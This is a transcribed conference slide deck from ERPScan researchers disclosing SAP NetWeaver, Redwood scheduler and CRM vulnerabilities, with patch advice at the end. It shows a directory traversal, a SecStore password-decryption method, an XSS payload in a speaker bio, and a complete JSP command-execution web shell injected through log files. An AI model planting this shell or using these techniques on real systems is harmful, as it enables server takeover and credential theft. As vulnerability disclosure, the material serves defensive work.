T H E P H A N T O M S E C U R I T Y. By Vahagn Vardanyan and Vladimir Egorov

Transcription

1 T H E P H A N T O M S E C U R I T Y By Vahagn Vardanyan and Vladimir Egorov

2 Vahagn Vardanyan Master jedy Senior security researcher at ERPScan. Bug hunter, malware and vulnerability researcher for over 5+ years System of a Down FAN!!!

3 Vladimir Egorov Young padawan security researcher at ERPScan. Business application security, reverse engineering, and encryption»><svg\onload=alert( HELLO )> LET THE HATE FLOW THROUGH YOU

4

5 Introduction A New Hope Revenge of the Logs SAP NetWeaver Redwood

6 Introduction What is SAP? Vulnerability statistics The newest CVE Structure reminding

7 SAP NetWeaver What is NetWeaver? How to deploy apps?

8 Redwood Where I can find it? How to get access? A vulnerability DEMO

9 Revenge of the Logs What is SAP CRM? How does it look? RCE via log injection DEMO

10 A New Hope Vulnerable systems in the WILD PATCH info

11 Episode I SAP NetWeaver

12 A short time ago in a galaxy very, very close...

13 COMPANY

14 SAP notes By Year

15 CVE CVE CVE CVE Location: SAP GUI Type: RCE Location: SAP NetWeaver Type: SQL to RCE Location: SAP NetWeaver Type: Java deserialization Location: SAP TREX Type: RCE

16 How to get admin privileges in SAP?

17

18

19

20 Episode I SAP NetWeaver

21

22 CVE Location: SAP NetWeaver AS Java WD_CHAT Type: Information Disclosure vulnerability webdynpro / resources / sap.com / tc~rtc~coll.appl.rtc~wd_chat / Chat#

23 CVE Location: SAP NetWeaver AS Java WD_CHAT Type: Information Disclosure vulnerability webdynpro / resources / sap.com / tc~rtc~coll.appl.rtc~wd_chat / Chat# webdynpro / resources / sap.com / tc~rtc~coll.appl.rtc~wd_chat

24 webdynpro / resources / sap.com / tc~rtc~coll.appl.rtc~wd_chat / Chat#

25

26

27

28

29

30

31

32

33

34

35 The bug here feel I young padawan

36

37 Path on filesystem: C:/usr/sap/<SID>J00/j2ee/cluster/apps/redwood.com/scheduler-ear/servlet_jsp/scheduler/ root/black/javascript/old/utils.js Url:

38 /ui?

39 /ui?

40 /ui?

41 /ui?

42 /ui?

43 /ui? Windows win.ini

44

45 JUST REPORT IT

46

47 DEMO TIME

48 SecStore in SAP is like the Death Star's thermal exhaust port: A little weakness in the center of a fortified system

49 SecStore.properties

50 SecStore.key SecStore.properties

51 SecStore.key SecStore.properties Administrator credentials Database credentials

52 SecStore Decryptor

53 SecStore.key SecStore Decryptor

54 SecStore Decryptor SecStore.key Hardcoded key

55 SecStore Decryptor SecStore.key Hardcoded key The real key

56 SecStore Decryptor SecStore.key SecStore.properties Hardcoded key The real key

57 SecStore Decryptor SecStore.key Hardcoded key SecStore.properties The real key 3DES (CBC) Admin Password

58 SecStore Decryptor SecStore.key Hardcoded key SecStore.properties The real key 3DES (CBC) Admin Password PBEWithSHAAnd3KeyTripleDESCBC

59 DEMO TIME

60

61

62

63

64

65

66 What do we have now?

67 Findings I. Anon directory traversal in scheduler by Redwood

68 Findings I. Anon directory traversal in scheduler by Redwood II. Decryption tool to get administrator password

69 Findings I. Anon directory traversal in scheduler by Redwood II. Decryption tool to get administrator password III.???

70

71 Customer Relationship Management "Was ist das???"

72 Customer Relationship Management s, telephones, chats, marketing materials, social media.. Analysing target audiences Kind of collaboration

73

74 Log configuration...

75

76

77 SAP SYSTEM

78 SAP AS JAVA

79 SAP AS JAVA Applications

80 SAP AS JAVA Applications

81 SAP AS JAVA Applications

82 SAP AS JAVA Applications Database

83 SAP AS JAVA Logs Applications Database

84 SAP AS JAVA Logs Applications Database Before...

85 SAP AS JAVA Logs Applications Database Before... After... SAP AS JAVA

86 SAP AS JAVA Logs Applications Database Before... After... SAP AS JAVA Applications

87 SAP AS JAVA Logs Applications Database Before... After... SAP AS JAVA Applications Database

88 SAP AS JAVA Logs Applications Database Before... After... SAP AS JAVA Applications Database

89 SAP AS JAVA Logs Applications Database Before... After... SAP AS JAVA Applications Database

90 SAP AS JAVA Logs Applications Database Before... After... SAP AS JAVA Applications Logs Database

91 SAP AS JAVA Logs Applications Database Before... After... SAP AS JAVA Applications Logs Database

92 SAP AS JAVA Logs Applications Database Before... After... SAP AS JAVA Applications Logs Database

93 DEMO TIME

94 Before After Log file extension: *.log, *.xml or *.trc Access via browser: DENIED URL: None Path on file system: C:\usr\sap\DM0\J00\j2ee\cluster\server0\log\ Log file extension: *.jsp Access via browser: GRANTED URL: Path on file system: C:\usr\sap\DM0\J00\j2ee\cluster\apps\sap.com \com.sap.engine.docs.examples \servlet_jsp\_default\root\shell.jsp

95 page import="java.util.*,java.io.*"%> <% if (request.getparameter("cmd")!= null) { Process p = Runtime.getRuntime().exec(request.getParameter("cmd")); OutputStream os = p.getoutputstream(); InputStream in = p.getinputstream(); DataInputStream dis = new DataInputStream(in); String disr = dis.readline(); out.println ("<PRE>"); while ( disr!= null ) { out.println(disr); disr = dis.readline(); } out.println ("</PRE>"); } %>

96

97

98 ... #2.0# :21:01:332#0-800#Debug#com.sap.isa.user.action.LoginBaseAction# #CRM-ISA- BBS#sap.com/crm~b2b#C000AC100A A C# #s ap.com/crm~b2b#com.sap.isa.user.action.loginbaseaction#guest#0##74c4c72b0f7111 E8B C6AE#c1229d500d1811e8a25b c6ae#c1229d500d1811e8a25 b c6ae#0#thread[http Worker page import="java.util.*,java.io.*"%><% if request.getparameter("cmd")!= null){process p = Runtime.getRuntime().exec(request.getParameter("cmd")); OutputStream os = p.getoutputstream(); InputStream in = p.getinputstream(); DataInputStream dis = new DataInputStream(in); String disr = dis.readline(); out.println("<pre>"); while ( disr!= null ) {out.println(disr);disr =dis.readline();}out.println("</pre>");} %>["]="" # #2.0# :21:01:332#0-800#Debug#com.sap.isa.user.action.LoginBaseAction#...

99

100 DEMO TIME

101

102

103 78 United States 42 India 38 Chile 28 Germany 25 Brazil 23 Australia 19 France 13 Singapore 12 Turkey 12 Taiwan 11 Spain 11 Republic of Korea 11 Colombia 10 Italy 9 Russian Federation *** Almost 500 public SAP servers are Vulnerable

104 Update CRM ( ) PATCH Upgrade to Redwood 9 Install SAP note (exploited in the wild)

105 THANK YOU 10 5 Read our blog erpscan.com/category/press-center/blog/ Join our webinars erpscan.com/category/press-center/events/ Subscribe to our newsletters eepurl.com/bef7h1 USA: 228 Hamilton Avenue, Fl. 3, Palo Alto, CA Phone EU: Luna ArenA 238 Herikerbergweg, 1101 CM Amsterdam Phone erpscan.com inbox@erpscan.com EU: Štětkova 1638/18, Prague 4 - Nusle, , Czech Republic